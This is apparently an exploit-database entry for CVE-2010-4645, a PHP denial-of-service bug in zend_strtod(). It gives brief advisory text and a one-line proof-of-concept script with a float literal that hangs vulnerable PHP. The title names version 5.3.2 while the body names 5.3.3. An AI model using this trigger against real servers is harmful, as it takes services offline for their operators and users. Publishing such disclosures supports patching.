PHP 5.3.2 - 'zend_strtod()' Floating-Point Value Denial of Service



EKU-ID: 39818 CVE: CVE-2010-4645;OSVDB-70370 OSVDB-ID:
Author: Rick Regan Published: 2011-01-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/45668/info

PHP is prone to a remote denial-of-service vulnerability.

Successful attacks will cause applications written in PHP to hang, creating a denial-of-service condition.

PHP 5.3.3 is vulnerable; other versions may also be affected.

<?php $d = 2.2250738585072011e-308; ?>